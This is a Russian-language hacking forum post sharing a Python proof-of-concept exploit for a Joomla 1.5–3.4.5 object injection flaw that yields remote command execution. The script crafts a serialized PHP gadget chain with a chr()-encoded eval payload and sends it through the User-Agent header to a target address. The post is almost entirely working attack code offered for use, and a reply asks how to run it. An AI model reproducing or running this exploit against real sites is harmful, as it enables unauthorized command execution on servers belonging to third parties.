• Добро пожаловать на сайт - Forumteam.wiki !

    Что бы просматривать темы форума необходимо зарегестрироваться или войти в свой аккаунт.

    Группа в телеграме (подпишитесь, что бы не потерять нас) - ForumTeam Chat [Подписатся]
    Связь с администратором - @ftmadmin

Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution

  • Автор темы mars0
  • Дата начала
  • Ответы 0
  • Просмотры 5K

mars0

Проявляет активность
Местный
Регистрация
11.11.17
Сообщения
473
Реакции
44
Баллы
320
FTC
10¢
Код:
Код:
'''

   Simple PoC for Joomla Object Injection.

   Gary @ Sec-1 ltd

   http://www.sec-1.com/

'''


import requests #  easy_install requests


def get_url(url, user_agent):


    headers = {

    'User-Agent': user_agent

    }

    cookies = requests.get(url,headers=headers).cookies

    for _ in range(3):

        response = requests.get(url, headers=headers,cookies=cookies)   

    return response

   

def php_str_noquotes(data):

    "Convert string to chr(xx).chr(xx) for use in php"

    encoded = ""

    for char in data:

        encoded += "chr({0}).".format(ord(char))


    return encoded[:-1]



def generate_payload(php_payload):


    php_payload = "eval({0})".format(php_str_noquotes(php_payload))


    terminate = '\xf0\xfd\xfd\xfd';

    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''

    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)   

    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)

    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate


    return exploit_template




pl = generate_payload("system('touch /tmp/fx');")


print get_url("http://172.31.6.242/", pl)
[IMG]
куда данный код вводить нужно?
Скрытое содержимое доступно для зарегистрированных пользователей!
 
Сверху Снизу